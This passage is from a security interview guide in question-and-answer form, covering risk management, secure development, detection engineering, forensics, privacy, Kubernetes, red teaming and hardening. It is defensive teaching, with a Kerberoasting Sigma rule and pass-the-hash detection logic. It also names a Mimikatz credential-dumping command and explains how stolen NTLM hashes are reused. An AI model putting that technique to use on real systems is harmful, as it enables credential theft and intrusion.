Environmental metrics: Modified base metrics for your specific environment. Accounts for compensating controls and asset importance.

Limitations: (1) Base score doesn't account for your environment — a CVSS 9.8 on an air-gapped system is different from one on an internet-facing server. (2) Doesn't account for exploit chain dependencies. (3) Doesn't measure actual risk (probability × impact) — only severity. (4) Score inflation — many CVEs rated Critical when real-world impact is limited. (5) Binary thinking — organizations treat everything >7 as urgent, ignoring context. (6) No business context — doesn't consider what the affected asset does or what data it handles.

What to do instead: Use CVSS as input to prioritization, not the sole determinant. Combine with: asset criticality, exposure (internet-facing?), exploit availability (EPSS score), compensating controls, and business context.
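
One way to sketch such a combined prioritization — the thresholds, weights, and tier names below are invented for illustration, not an industry standard:

```python
def remediation_priority(cvss: float, epss: float, internet_facing: bool,
                         asset_critical: bool, kev: bool = False) -> str:
    """Toy prioritization combining CVSS severity with exposure and exploit signal.

    kev = listed in the CISA Known Exploited Vulnerabilities catalog.
    """
    # Known or highly likely exploitation of a reachable asset jumps the queue.
    if kev or (epss >= 0.5 and internet_facing):
        return "P1-emergency"
    score = cvss / 10                        # normalize severity to 0-1
    score += 0.3 if internet_facing else 0.0 # exposure weight
    score += 0.2 if asset_critical else 0.0  # business-context weight
    score += min(epss, 0.3)                  # capped exploit-probability weight
    if score >= 1.0:
        return "P2-urgent"
    if score >= 0.7:
        return "P3-scheduled"
    return "P4-backlog"
```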

Q8.3: What is a risk register? How do you maintain one?

A: A risk register is a structured inventory of identified risks with their assessment, treatment, and ownership.

Fields per risk entry: Risk ID, description, threat source, vulnerability exploited, affected assets, likelihood (quantified or rated), impact (quantified or rated), inherent risk score (before controls), current controls, residual risk score (after controls), risk treatment (accept/mitigate/transfer/avoid), risk owner (person accountable), mitigation plan and timeline, status, last review date.

Maintenance: (1) Review quarterly at minimum, monthly for high-risk items. (2) Update after: new threat intelligence, incidents, architecture changes, new regulations, control assessments. (3) Risk owners validate their risks each review cycle. (4) Track risk trends over time — are residual scores decreasing? (5) Board/executive reporting: top 10 risks, new risks, risk trend, overdue mitigations.

Common failures: (1) Risk registers that are never updated (snapshot, not living document). (2) No risk owners — risks assigned to "the security team" instead of business owners. (3) All risks rated "Medium" to avoid difficult conversations. (4) No connection between risk register and actual prioritization decisions.

Q8.4: How do you communicate risk to executives and the board?

A: Executives don't care about CVE numbers or technical details. They care about: business impact, financial exposure, competitive risk, regulatory risk, and what you need from them.

Framework: (1) Lead with business impact: "If this risk materializes, we face $2-5M in incident response costs, potential regulatory fines under GDPR Article 83 (up to 4% of annual revenue), and an estimated 15% customer churn based on industry breach data." (2) Contextualize with industry: "Peer companies in our sector experienced 3 material breaches last year with average cost of $4.5M (IBM Cost of a Data Breach Report)." (3) Present options, not mandates: "Option A costs $500K and reduces risk by 80%. Option B costs $200K and reduces risk by 50%. Option C: accept the risk with documented rationale." (4) Use trends: "Our mean time to detect decreased from 14 days to 2 days this quarter. Our open critical vulnerabilities decreased 60%." (5) Be honest about unknowns: "We have high confidence in our application security posture. We have lower confidence in our supply chain risk — this is where I'm requesting additional investment."

Metrics that resonate: Mean time to detect (MTTD), mean time to respond (MTTR), percentage of critical vulnerabilities patched within SLA, security incidents by severity trend, coverage metrics (% of assets with EDR, % of code with SAST coverage, % of employees completing security training).


9. Secure Development Lifecycle

Q9.1: What does a mature Secure SDLC look like?

A: Security integrated at every phase, not bolted on at the end:

Requirements: Security requirements derived from threat model. Abuse cases alongside use cases. Compliance requirements identified (PII handling, encryption requirements, audit logging).

Design: Threat modeling (STRIDE) for all new features and architecture changes. Security architecture review for major changes. Selection of vetted frameworks and libraries.

Implementation: Secure coding training for developers. Pre-commit hooks (secrets scanning). IDE plugins for real-time security feedback. Peer code review with security checklist.

Testing: SAST in CI (every PR). SCA for dependency vulnerabilities (every build). DAST in staging. Manual penetration testing for major releases. Fuzz testing for parsers and protocol handlers.

Deployment: IaC security scanning (Checkov, tfsec). Container image scanning. Signed artifacts. Immutable deployments. Secrets injected at runtime, not build time.

Operations: Runtime application self-protection (RASP) or WAF. Security monitoring and alerting. Vulnerability management SLAs (Critical: 24h, High: 7d, Medium: 30d, Low: 90d). Bug bounty program for continuous external testing.
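
The SLA windows above reduce to a trivial check that can gate dashboards or ticket escalation. A sketch:

```python
from datetime import datetime, timedelta

# Remediation SLA windows from the text: Critical 24h, High 7d, Medium 30d, Low 90d.
SLA = {
    "critical": timedelta(hours=24),
    "high": timedelta(days=7),
    "medium": timedelta(days=30),
    "low": timedelta(days=90),
}

def is_overdue(severity: str, discovered: datetime, now: datetime) -> bool:
    """True once a finding has exceeded its remediation SLA window."""
    return now - discovered > SLA[severity]
```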

Feedback loop: Post-incident analysis feeds back into requirements. Vulnerability trends inform training focus. Metrics drive improvement.

Q9.2: How do you handle a zero-day vulnerability in a critical dependency?

A: Hour 0-1 (Assessment): (1) Identify all instances of the affected dependency across all repositories and environments (SCA/SBOM). (2) Determine exploitability — does our usage pattern trigger the vulnerable code path? (3) Assess exposure — is the vulnerable component internet-facing? (4) Check for active exploitation (CISA KEV catalog, threat intel feeds).

Hour 1-4 (Mitigation): (5) If patch available: test and deploy to production via expedited change process. (6) If no patch: deploy compensating controls (WAF rules, network restrictions, feature disable, input validation). (7) IMDSv2-style defense: can we change the environment to make exploitation impossible even without patching the code?

Hour 4-24 (Hardening): (8) Enhanced monitoring — deploy specific detection rules for exploitation attempts. (9) Hunt for evidence of past exploitation (may have been exploited before disclosure). (10) Communicate status to stakeholders.

Post-incident: (11) Review SBOM completeness — did we know about all instances? (12) Evaluate dependency health — should we migrate to an alternative? (13) Update playbook for dependency vulnerability response.
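
The hour-0 instance sweep in step (1) is straightforward to automate against the SBOMs you already generate. A minimal sketch over parsed CycloneDX JSON (the top-level components array is the documented CycloneDX shape; the package names in the usage note are illustrative):

```python
def find_affected(sbom: dict, package: str, bad_versions: set):
    """Return (name, version) for every instance of a vulnerable package
    in one parsed CycloneDX JSON SBOM (top-level 'components' array)."""
    return [
        (c.get("name"), c.get("version"))
        for c in sbom.get("components", [])
        if c.get("name") == package and c.get("version") in bad_versions
    ]

# In practice: json.load() the SBOM for every repo/environment and
# aggregate the hits into the assessment spreadsheet.
```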


10. Detection Engineering

Q10.1: How do you approach detection engineering for a specific TTP?

A: Start from the attacker's perspective: What must the attacker do that is observable? What artifacts do they create?

Framework: (1) Understand the TTP: Read MITRE ATT&CK technique description. Study real-world examples from threat intel reports. Lab it — execute the technique in a test environment and observe what telemetry is generated.

(2) Identify data sources: What logs capture this activity? Process creation events (Sysmon Event ID 1), network connections (Zeek), file modifications (auditd), authentication events (Windows 4624), API calls (CloudTrail). If the required data source isn't collected, detection is impossible — this is your gap analysis.

(3) Write the detection logic: Start broad (low precision, high recall), then tune. Example for T1003.001 (LSASS memory access): detect processes opening a handle to lsass.exe with memory read permissions. Filter known good (AV, EDR agents). Use Sigma for portable detection logic.

(4) Validate: Test against real attack tools (Mimikatz, nanodump). Test against benign true positives (legitimate software that triggers the rule). Measure: detection rate, false positive rate, time to detect.

(5) Operationalize: Deploy to SIEM/EDR. Create runbook for analysts handling the alert. Set severity based on confidence and impact. Tune false positives with exclusions (document why).

(6) Maintain: Review quarterly. Update for new evasion techniques. Track detection metrics (alerts generated, true positive rate, MTTD).

Q10.2: Write a Sigma rule for detecting Kerberoasting.

A:

title: Kerberoasting - Suspicious TGS Ticket Request
id: a7c5e4b2-3d1f-4e8a-9c6b-2f0d8e7a1b3c
status: experimental
description: >
  Detects excessive Kerberos TGS (Ticket Granting Service) requests
  using RC4 encryption, which may indicate a Kerberoasting attack
  attempting to crack service account passwords offline.
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: '0x17'  # RC4-HMAC
    Status: '0x0'                 # Success
  filter_machine_accounts:
    ServiceName|endswith: '$'    # Machine accounts use RC4 legitimately
  filter_krbtgt:
    ServiceName: 'krbtgt'
  condition: selection and not filter_machine_accounts and not filter_krbtgt
  # Add count-based threshold in SIEM: >10 events from same source in 5 minutes
falsepositives:
  - Legacy applications requiring RC4 Kerberos tickets
  - Service accounts with SPNs accessed during legitimate batch operations
level: high
tags:
  - attack.t1558.003
  - attack.credential_access

Tuning notes: (1) Threshold on count per source IP/user within time window reduces FP from legitimate service access. (2) Correlate with T1087.002 (account discovery) preceding the TGS requests. (3) Monitor for AES downgrade — if environment supports AES, RC4 requests are more suspicious. (4) Whitelist known service monitoring tools that legitimately query multiple SPNs.
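
The count-based threshold from tuning note (1) can be sketched as a per-source sliding window over pre-filtered 4769 events (the tuple layout and the 10-in-5-minutes numbers are illustrative; production SIEMs do this aggregation natively):

```python
from collections import defaultdict, deque

def kerberoast_alerts(events, threshold=10, window=300):
    """events: (timestamp_seconds, source, service_name) tuples from
    4769 logs already filtered to RC4 tickets, with machine accounts
    and krbtgt excluded. Alert when one source requests `threshold`
    distinct SPNs inside `window` seconds."""
    recent = defaultdict(deque)   # source -> deque of (time, service)
    alerts = set()
    for t, source, service in sorted(events):
        q = recent[source]
        q.append((t, service))
        while q and t - q[0][0] > window:   # expire old requests
            q.popleft()
        if len({svc for _, svc in q}) >= threshold:
            alerts.add(source)
    return alerts
```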


11. Forensics and Evidence

Q11.1: Explain the order of volatility. Why does it matter?

A: Evidence should be collected in order of most volatile to least volatile (RFC 3227):

  1. CPU registers and cache — lost immediately on context switch
  2. Memory (RAM) — running processes, network connections, encryption keys, malware in memory-only. Lost on reboot.
  3. Network state — active connections, ARP cache, routing tables. Changes rapidly.
  4. Running processes — process list, open files, loaded modules.
  5. Disk — files, logs, swap space, slack space. Persists across reboot but can be overwritten.
  6. Remote logging — SIEM, central log servers. Most durable.
  7. Physical evidence — hardware configuration, network cables.

Why it matters: If you start with disk forensics and reboot the system, you lose everything in categories 1-4. Memory often contains the most valuable evidence — decrypted data, malware that never touches disk (fileless attacks), encryption keys, command history. Always capture memory first, then network state, then disk image.

Q11.2: How do you perform memory forensics? What are you looking for?

A: Acquisition: Linux: avml, LiME kernel module, /proc/kcore. Windows: WinPmem, Magnet RAM Capture, DumpIt. Capture to external media or network share — never to the suspect system's disk.

Analysis tool: Volatility 3 (or Rekall). Requires the correct symbol table / profile for the OS version.

What to look for:

(1) Process analysis: pslist, pstree, psscan (finds hidden/unlinked processes). Look for: suspicious process names, processes with no parent, processes spawned from unusual locations (Temp, Downloads), processes injecting into other processes.

(2) Network connections: netscan — active and recently closed connections. Look for: connections to known C2 IPs, unusual ports, established connections from unexpected processes.

(3) Injected code: malfind — detects code injection in process memory (PAGE_EXECUTE_READWRITE regions). hollowfind — detects process hollowing.

(4) DLLs and modules: dlllist, ldrmodules — look for DLLs loaded from unusual paths, unlinked DLLs, DLL search order hijacking.

(5) Handles and registry: handles — open file handles, registry keys, mutexes. hivelist, printkey — registry analysis for persistence.

(6) Command history: cmdscan, consoles — recover command-line history from cmd.exe/PowerShell memory.

(7) Strings extraction: Dump process memory and search for strings — URLs, IPs, credentials, commands.

(8) Timeline: Combine memory artifacts with file system timestamps for comprehensive timeline.
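
Item (7) is often the quickest win. A crude triage sketch over raw dump bytes; the two patterns are starting points only, and expect benign hits (version strings, library constants) that need manual review:

```python
import re

URL_RE  = re.compile(rb"https?://[\x21-\x7e]{4,200}")
IPV4_RE = re.compile(rb"(?:\d{1,3}\.){3}\d{1,3}")

def extract_iocs(dump: bytes):
    """Pull URL and IPv4 candidates out of raw process memory dumped
    with Volatility. Deliberately crude: triage before deep analysis."""
    urls = {m.group().decode("ascii", "replace") for m in URL_RE.finditer(dump)}
    ips  = {m.group().decode() for m in IPV4_RE.finditer(dump)}
    return urls, ips
```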


12. Privacy and Compliance

Q12.1: Explain GDPR's key principles and how they affect architecture decisions.

A: Core principles (Article 5): (1) Lawfulness, fairness, transparency. (2) Purpose limitation — collect for specified purposes only. (3) Data minimization — collect only what's necessary. (4) Accuracy — keep data correct and up to date. (5) Storage limitation — don't keep data longer than needed. (6) Integrity and confidentiality — appropriate security measures. (7) Accountability — demonstrate compliance.

Architecture implications: (1) Data inventory: You must know where all personal data is — implement data discovery and classification. (2) Consent management: Need infrastructure to record, track, and honor consent. Must support withdrawal of consent. (3) Right to erasure (Article 17): Architecture must support deletion of a user's data across ALL systems — databases, backups, caches, logs, analytics, third-party integrations. This is architecturally non-trivial. Consider: crypto-shredding (encrypt per-user, delete key to effectively delete data). (4) Data portability (Article 20): Export user data in machine-readable format. (5) Privacy by Design (Article 25): Pseudonymization, encryption, access controls built in from the start. (6) Data Protection Impact Assessment (DPIA, Article 35): Required for high-risk processing. (7) Breach notification (Article 33): 72 hours to supervisory authority — requires incident detection and response capability. (8) Cross-border transfers: Standard Contractual Clauses (SCCs) or adequacy decisions for data leaving EEA.
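
The crypto-shredding idea from point (3) can be illustrated in a few lines. This is a toy (XOR against a SHA-256 keystream, keys in an in-memory dict) purely to show the key-deletion property; a real system would use AES-GCM from a vetted library with per-user keys held in a KMS/HSM:

```python
import hashlib, itertools, os

class CryptoShredStore:
    """Toy crypto-shredding: one key per user; deleting the key makes
    every copy of that user's ciphertext (including backups) unreadable
    without touching the ciphertext itself. NOT real cryptography."""
    def __init__(self):
        self._keys = {}

    def _keystream(self, key: bytes, n: int) -> bytes:
        out = b""
        for counter in itertools.count():
            out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
            if len(out) >= n:
                return out[:n]

    def encrypt(self, user: str, plaintext: bytes) -> bytes:
        key = self._keys.setdefault(user, os.urandom(32))
        ks = self._keystream(key, len(plaintext))
        return bytes(a ^ b for a, b in zip(plaintext, ks))

    def decrypt(self, user: str, ciphertext: bytes) -> bytes:
        if user not in self._keys:
            raise KeyError("key shredded: data is unrecoverable")
        ks = self._keystream(self._keys[user], len(ciphertext))
        return bytes(a ^ b for a, b in zip(ciphertext, ks))

    def erase_user(self, user: str):
        self._keys.pop(user, None)   # Article 17 erasure = key deletion
```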

Q12.2: How does data classification drive security controls?

A: Data classification establishes a taxonomy that maps to control requirements:

Common levels: (1) Public — no impact if disclosed. Marketing materials, public documentation. Controls: integrity protection only. (2) Internal — minor impact if disclosed. Internal communications, non-sensitive business data. Controls: access control, basic encryption in transit. (3) Confidential — significant impact. Customer data, financial data, source code. Controls: encryption at rest and in transit, access logging, need-to-know access, DLP monitoring. (4) Restricted — severe impact. PII, PHI, payment card data, cryptographic keys, credentials. Controls: strong encryption, MFA for access, detailed audit logging, data masking in non-production environments, geographic restrictions.

Architecture mapping: Classification drives: which encryption keys/KMS to use, retention policies, backup requirements, access control granularity, monitoring intensity, incident response severity, geographic placement (data residency), and whether data can flow to third parties.


13. Container and Kubernetes Security

Q13.1: What are the top Kubernetes security risks and mitigations?

A: (1) Exposed API server: K8s API server on port 6443 is the keys to the kingdom. Mitigation: private API endpoint, RBAC, audit logging, network policies restricting access, disable anonymous auth.

(2) Overprivileged containers: Running as root, host PID/network namespace, privileged mode. Mitigation: PodSecurityStandards (Restricted profile), runAsNonRoot: true, readOnlyRootFilesystem: true, drop all capabilities, Seccomp/AppArmor profiles.

(3) Vulnerable images: Base images with known CVEs, malware. Mitigation: image scanning in CI/CD (Trivy, Grype), only allow images from trusted registries (OPA/Kyverno admission policies), minimal base images (distroless, alpine).

(4) Secrets in plain text: Kubernetes Secrets are base64-encoded (not encrypted). Mitigation: encrypt etcd at rest, use external secrets managers (Vault, AWS Secrets Manager) with CSI driver or external-secrets operator.

(5) Network lateral movement: By default, all pods can communicate with all other pods. Mitigation: NetworkPolicies (default deny, explicit allow). Service mesh (Istio, Linkerd) for mTLS between services.

(6) RBAC misconfiguration: Overprivileged service accounts, cluster-admin bindings. Mitigation: least privilege RBAC, no cluster-admin for workloads, audit RBAC bindings regularly, disable automounting of service account tokens when not needed.

(7) Supply chain: Compromised Helm charts, malicious operators. Mitigation: verify chart signatures, review operator permissions, SLSA provenance for container images.
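
A few of the overprivilege checks from (2), sketched as an admission-style review of a parsed pod manifest. Real enforcement belongs in Pod Security Admission or an OPA/Kyverno policy; the field names follow the pod spec, the check list is illustrative:

```python
def pod_violations(pod: dict):
    """Flag Restricted-profile violations in a parsed pod manifest."""
    issues = []
    spec = pod.get("spec", {})
    if spec.get("hostNetwork") or spec.get("hostPID"):
        issues.append("host namespace sharing")
    for c in spec.get("containers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            issues.append(f"{c['name']}: privileged")
        if not sc.get("runAsNonRoot"):
            issues.append(f"{c['name']}: may run as root")
        if sc.get("allowPrivilegeEscalation", True):   # defaults to allowed
            issues.append(f"{c['name']}: allowPrivilegeEscalation not disabled")
    return issues
```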


14. Advanced Attacks and Red Team

Q14.1: Explain the differences between penetration testing and red teaming.

A: Penetration testing: Scoped, time-boxed assessment of specific targets. Goal: find as many vulnerabilities as possible within scope. Rules of engagement clearly defined. Typically 1-4 weeks. Tests technical controls. Report is a list of findings with severity ratings.

Red teaming: Adversary simulation against the entire organization. Goal: test detection and response capabilities, not just find vulnerabilities. Objectives-based (e.g., "access CEO email," "exfiltrate customer database"). May include social engineering, physical access. Typically 4-12 weeks. Tests people, processes, and technology. Only a few people know it's happening (minimizes observer effect). Report focuses on attack narrative, detection gaps, and response effectiveness.

Purple teaming: Collaborative exercise where red team executes attacks and blue team attempts to detect them in real time. Iterative — red executes, blue adjusts detection, red tries to evade, repeat. Produces: detection coverage map against MITRE ATT&CK, detection gap list, tuned detection rules.

Q14.2: What is Pass-the-Hash? How do you detect and prevent it?

A: Attack: Windows caches NTLM password hashes in memory (LSASS process). Attacker with local admin on one system dumps hashes (Mimikatz sekurlsa::logonpasswords) and uses the hash directly to authenticate to other systems — no password cracking needed. The NTLM protocol accepts the hash as authentication proof.

Why it works: NTLM challenge-response doesn't require the plaintext password — the hash IS the credential. If the same local admin password is used across multiple systems, one compromise gives access to all of them.

Detection: (1) Monitor for LSASS access (Sysmon Event ID 10, target process lsass.exe). (2) Look for logon type 9 (NewCredentials) with NTLM authentication in Event ID 4624. (3) Detect tools: Mimikatz signatures, suspicious PowerShell, unusual LSASS memory dumps. (4) Behavioral: authentication from unexpected sources, lateral movement patterns.

Prevention: (1) Credential Guard (Windows 10+) — isolates NTLM hashes in virtualization-based security, inaccessible to LSASS. (2) Disable NTLM where possible — enforce Kerberos. (3) Local Administrator Password Solution (LAPS) — unique local admin passwords per system. (4) Privileged Access Workstations (PAWs) — admin credentials only used from hardened systems. (5) Tiered administration — domain admin credentials never touch regular workstations. (6) Protected Users security group — prevents NTLM authentication for members.
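
Detection item (2) as a heuristic over parsed 4624 events. Field names follow the Windows Security log schema; the seclogo check reflects the logon-process artifact Mimikatz sekurlsa::pth typically leaves, and any rule like this needs tuning against legitimate runas /netonly usage:

```python
def pth_suspects(events):
    """Flag 4624 events matching the pass-the-hash pattern:
    LogonType 9 (NewCredentials) plus NTLM auth or seclogo."""
    hits = []
    for e in events:
        if e.get("EventID") != 4624 or e.get("LogonType") != 9:
            continue
        if e.get("AuthenticationPackageName", "").upper().startswith("NTLM") \
           or e.get("LogonProcessName", "").lower() == "seclogo":
            hits.append((e.get("TargetUserName"), e.get("IpAddress")))
    return hits
```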

Q14.3: Explain supply chain attacks. How do you defend against them?

A: Supply chain attacks compromise a target by infiltrating a trusted third party — software vendor, open source dependency, build system, or hardware manufacturer.

Notable examples: SolarWinds/SUNBURST (2020) — malicious code inserted into SolarWinds Orion build process, deployed to ~18,000 organizations via signed updates. Codecov (2021) — bash uploader script modified to exfiltrate CI/CD environment variables (secrets). xz-utils (2024) — multi-year social engineering campaign to become a trusted maintainer and insert a backdoor into liblzma that compromised SSH authentication. npm/PyPI dependency confusion — attackers publish packages to public registries matching private package names.

Defenses: (1) SBOM (Software Bill of Materials) — know every component in your software. Generate with Syft, CycloneDX. Track against vulnerability databases. (2) Dependency pinning — pin by hash, not version. Prevents substitution. (3) Private registry mirrors — proxy public registries, scan and approve before allowing internal use. Prevents dependency confusion. (4) SLSA framework — require provenance attestations for build artifacts. Verify build integrity. (5) Code signing — verify signatures on all updates. (6) Vendor security assessment — evaluate critical vendors' security practices. (7) Zero trust for vendor connections — minimum required access, monitoring, segmentation. (8) Build reproducibility — ability to rebuild from source and verify output matches distributed binary.
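
Defense (2), pinning by hash, reduces to a single digest comparison, the same check pip --require-hashes and go.sum perform: substituting a different artifact (dependency confusion, registry compromise) changes the digest and fails closed.

```python
import hashlib

def verify_artifact(data: bytes, pinned_sha256: str) -> bool:
    """True iff the downloaded bytes match the pinned SHA-256 digest."""
    return hashlib.sha256(data).hexdigest() == pinned_sha256.lower()
```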


15. Logging, Monitoring, and SIEM

Q15.1: What logs should every organization collect and monitor?

A: Authentication and access: (1) Successful and failed logins (source IP, user, timestamp, MFA used). (2) Privilege escalation events (sudo, runas, role assumption). (3) Account creation, modification, deletion. (4) Group membership changes. (5) Password changes and resets.

Network: (6) DNS queries (source, queried domain, response). (7) Firewall logs (allow and deny). (8) VPN connections. (9) Proxy/web gateway logs (URL, user, category). (10) VPC flow logs / netflow.

Endpoint: (11) Process creation with command line (Sysmon Event 1, auditd execve). (12) File creation/modification in sensitive directories. (13) Service/scheduled task installation. (14) Driver/kernel module loading. (15) PowerShell script block logging.

Application: (16) Authentication events. (17) Authorization failures. (18) Input validation failures. (19) Application errors with stack traces (to security team, not to users). (20) API calls with authentication context.

Cloud: (21) CloudTrail (AWS) / Activity Log (Azure) / Cloud Audit Logs (GCP). (22) Resource creation and modification. (23) IAM policy changes. (24) Data access logs (S3 access logging, Cloud Storage audit logs).

Key principle: Log what you need to investigate. If you can't tell the story of an incident from your logs, you're not collecting enough. Retention: minimum 90 days hot, 1 year cold for most compliance frameworks.

Q15.2: How do you reduce alert fatigue in a SOC?

A: Alert fatigue is the #1 operational problem in security operations. Analysts ignore alerts when the noise is overwhelming.

Root causes: Too many low-fidelity rules, no tuning process, alerts without context, no severity differentiation.

Solutions: (1) Tune relentlessly: Every false positive should result in a rule update. Track FP rate per rule. Kill rules with >90% FP rate and rewrite them. (2) Tiered alerting: Not every detection needs a human. Tier 1: automated enrichment and triage (SOAR). Tier 2: analyst review. Tier 3: escalation. (3) Correlation rules: Single events are rarely actionable. Correlate: failed login + successful login from new location + sensitive data access = high-fidelity alert. (4) Context enrichment: Automatically attach: asset criticality, user context (VIP? Admin? Service account?), threat intel match, historical activity. (5) Detection-as-code: Version control detection rules. Require test cases (must catch known-bad, must not fire on known-good). PR review for rule changes. (6) Metrics: Track: alerts per analyst per shift, MTTD, MTTR, FP rate, detection coverage vs ATT&CK. Use metrics to drive improvement. (7) Playbooks: Clear, step-by-step investigation procedures for each alert type. Reduces decision fatigue and ensures consistency.
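
Solution (3) as a minimal sequence correlation. The event tuple layout and one-hour window are illustrative, and the "new location" determination is assumed precomputed from a per-user baseline store:

```python
from collections import defaultdict

SEQUENCE = ("failed_login", "login_new_location", "sensitive_access")

def correlate(events, window=3600):
    """events: (timestamp, user, event_type) tuples. Returns users for
    whom the full sequence occurred in order within the window: one
    high-fidelity alert instead of three noisy ones."""
    by_user = defaultdict(list)
    for t, user, etype in sorted(events):
        by_user[user].append((t, etype))
    alerts = []
    for user, evs in by_user.items():
        for i, (t0, e0) in enumerate(evs):
            if e0 != SEQUENCE[0]:
                continue
            idx = 1
            for t, e in evs[i + 1:]:
                if t - t0 > window:
                    break
                if e == SEQUENCE[idx]:
                    idx += 1
                    if idx == len(SEQUENCE):
                        alerts.append(user)
                        break
            if user in alerts:
                break
    return alerts
```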


16. Secure Infrastructure

Q16.1: How do you harden a Linux server?

A: OS-level: (1) Minimal install — remove unnecessary packages. (2) Patch management — automated security updates (unattended-upgrades). (3) Disable root login over SSH. (4) SSH key-only authentication (disable password auth). (5) SSH hardening: PermitRootLogin no, PasswordAuthentication no, AllowUsers/AllowGroups, MaxAuthTries 3. (6) Configure sudo with least privilege (no NOPASSWD, specific commands only). (7) Remove SUID/SGID bits where not needed. (8) Set noexec,nosuid,nodev on /tmp, /var/tmp, /dev/shm.

Filesystem: (9) Enable filesystem auditing (auditd). (10) Set umask 027. (11) Immutable flag on critical configs (chattr +i). (12) Separate partitions for /, /var, /home, /tmp.

Network: (13) Host firewall (iptables/nftables) — default deny inbound, allow only required ports. (14) Disable IPv6 if not used. (15) Disable unnecessary services (systemctl disable). (16) TCP wrappers or firewall rules for service-level access control.

Kernel: (17) Sysctl hardening: kernel.randomize_va_space=2 (ASLR), net.ipv4.conf.all.rp_filter=1 (anti-spoofing), kernel.dmesg_restrict=1, kernel.kptr_restrict=2, disable IP forwarding. (18) Disable kernel module loading after boot (kernel.modules_disabled=1).

Monitoring: (19) Deploy EDR/HIDS agent. (20) Central log shipping (rsyslog/journald to SIEM). (21) File integrity monitoring (AIDE, OSSEC).

Baseline: CIS Benchmark for the specific OS distribution. Automate compliance checking with OpenSCAP or Lynis.
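
A spot-check of the SSH directives from point (5) against an sshd_config is a few lines; a real audit would use an OpenSCAP or Lynis profile, and the expected-value table here covers only a subset:

```python
EXPECTED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "maxauthtries": "3",
}

def audit_sshd_config(text: str):
    """Return {directive: (expected, actual)} for every deviation.
    Parses the simple 'Directive value' format, ignoring comments.
    An absent directive counts as a deviation, since sshd defaults
    are often the permissive ones."""
    actual = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            parts = line.split(None, 1)
            if len(parts) == 2:
                actual[parts[0].lower()] = parts[1].strip().lower()
    return {d: (want, actual.get(d)) for d, want in EXPECTED.items()
            if actual.get(d) != want}
```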

Q16.2: What is infrastructure as code (IaC) security?

A: IaC (Terraform, CloudFormation, Pulumi) defines infrastructure declaratively. Security implications:

Benefits: (1) Infrastructure changes go through code review (security review by default). (2) Drift detection — actual state compared to declared state. (3) Reproducibility — consistent security controls across environments. (4) Auditability — git history shows who changed what and when.

Risks: (1) Misconfigurations at scale — a single bad Terraform module deploys insecure infrastructure everywhere. (2) Secrets in state files — Terraform state can contain passwords, keys. (3) Overprivileged deployment credentials — CI/CD pipeline with admin access to entire cloud environment.

Security controls: (1) Policy-as-code scanning: Checkov, tfsec, Terrascan in CI/CD. Check for: public S3 buckets, security groups open to 0.0.0.0/0, unencrypted resources, missing logging. (2) OPA/Rego policies: Custom organization-specific policies enforced as admission control. (3) State file protection: Encrypted remote backend (S3 + DynamoDB lock with SSE), restricted access. (4) Module registry: Approved, security-reviewed Terraform modules that teams must use. (5) Least privilege for deployment: Scoped IAM roles per Terraform workspace/project. (6) Plan review: terraform plan output reviewed before terraform apply.
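
Control (1) in miniature: scanning parsed terraform show -json output for world-open ingress, the same class of check Checkov and tfsec run. The plan schema below is simplified to the fields this check needs:

```python
def open_ingress_findings(plan: dict):
    """Return (resource address, from_port) for every aws_security_group
    ingress rule open to 0.0.0.0/0 in a parsed Terraform plan JSON."""
    findings = []
    for rc in plan.get("resource_changes", []):
        if rc.get("type") != "aws_security_group":
            continue
        after = (rc.get("change") or {}).get("after") or {}
        for rule in after.get("ingress", []):
            if "0.0.0.0/0" in rule.get("cidr_blocks", []):
                findings.append((rc.get("address"), rule.get("from_port")))
    return findings
```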


17. Advanced Topics

Q17.1: What is homomorphic encryption and when is it practical?

A: Homomorphic encryption allows computation on encrypted data without decrypting it. The result, when decrypted, matches the result of performing the computation on plaintext.

Types: (1) Partially homomorphic (PHE): Supports one operation (addition OR multiplication). RSA is multiplicatively homomorphic. Paillier is additively homomorphic. (2) Somewhat homomorphic (SHE): Supports limited number of both operations. (3) Fully homomorphic (FHE): Supports arbitrary computations. Lattice-based schemes (BFV, CKKS, TFHE).
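
Paillier's additive property can be shown end to end with toy parameters (61 and 53 are demonstration primes only; real deployments use 2048-bit moduli and a vetted library):

```python
import math

p, q = 61, 53
n = p * q                       # public modulus
n2 = n * n
g = n + 1                       # standard generator choice
lam = math.lcm(p - 1, q - 1)    # private key
mu = pow(lam, -1, n)            # with g = n+1, L(g^lam mod n^2) = lam mod n

def encrypt(m, r):
    # c = g^m * r^n mod n^2; random r coprime to n gives semantic security
    return (pow(g, m, n2) * pow(r, n, n2)) % n2

def decrypt(c):
    # m = L(c^lam mod n^2) * mu mod n, where L(x) = (x - 1) // n
    return ((pow(c, lam, n2) - 1) // n * mu) % n

# Multiplying ciphertexts adds plaintexts: Dec(Enc(12) * Enc(30)) = 42
c1, c2 = encrypt(12, 17), encrypt(30, 23)
assert decrypt((c1 * c2) % n2) == 42
```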

Practical use cases today: (1) Private set intersection (PSI) — two parties determine common elements without revealing their full sets. Used in ad measurement, contact discovery. (2) Encrypted database queries — search encrypted data without decrypting. (3) Secure multi-party computation — federated machine learning on encrypted data. (4) Privacy-preserving analytics — aggregate statistics without accessing individual records.

Limitations: Performance overhead is still roughly 1,000x to 1,000,000x compared to plaintext computation (depending on scheme and operation). Keys and ciphertexts are large (megabytes to gigabytes). Not practical for general-purpose computation. Active area of research with rapid improvements.

Q17.2: Explain side-channel attacks. Give examples and mitigations.

A: Side-channel attacks extract secrets by observing physical characteristics of computation rather than attacking the algorithm itself.

